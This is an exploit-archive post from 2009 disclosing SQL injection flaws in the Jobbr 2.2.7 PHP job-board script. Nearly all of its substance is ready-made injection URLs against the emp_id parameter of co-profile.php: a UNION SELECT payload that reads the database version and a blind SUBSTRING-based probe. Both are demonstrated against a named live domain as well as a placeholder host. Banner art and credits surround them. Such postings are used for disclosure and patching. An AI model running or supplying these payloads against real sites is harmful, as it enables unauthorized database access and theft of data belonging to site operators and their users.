[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Jobbr 2.2.7 Multiple Remote SQL Injection Vulnerabilities
# Published : 2009-07-10
# Author : Moudi
# Previous Title : WordPress Privileges Unchecked in admin.php and Multiple Information
# Next Title : Joomla Component com_propertylab (auction_id) SQL injection Vuln
###########################################################################
#-----------------------------I AM MUSLIM !!------------------------------#
###########################################################################
==============================================================================
_ _ _ _ _ _
/ | | | | / | | | |
/ _ | | | | / _ | |_| |
/ ___ | |___ | |___ / ___ | _ |
IN THE NAME OF /_/ _ |_____| |_____| /_/ _ |_| |_|
==============================================================================
[??] Hmmmm !? Nothing ! :D
==============================================================================
[??] Jobbr v2.2.7 Multiple Remote SQL Injection Vulnerabilities
==============================================================================
[??] Script: [ Jobbr v2.2.7 ]
[??] Language: [ PHP ]
[??] Download: [ http://urx.in/jobbr ]
[??] Founder: [ Moudi or SixSo <m0udi@9.cn> ]
[??] Thanks to: [ MiZoZ , ZuKa , str0ke , 599em Man...]
[??] Team: [ EvilWay ]
[??] SiteWeb: [ Visit - www.opensc.ws ]
[??] Price: [ FREE ]
###########################################################################
===[ Exploit BLIND SQL + DEMO ]===
[??] http://www.site.com/co-profile.php?emp_id=[SQL]
[??] http://www.jobbr.us/co-profile.php?emp_id=null+union+select+version(),2,3,4,5,6,7,8--
===[ Exploit BLIND SQL + DEMO ]===
[??] http://www.site.com/co-profile.php?emp_id=[BLIND]
[??] http://www.jobbr.us/co-profile.php?emp_id=1+AND%20SUBSTRING(@@version,1,1)=5
Author: Moudi
###########################################################################
# www.Syue.com [2009-07-10]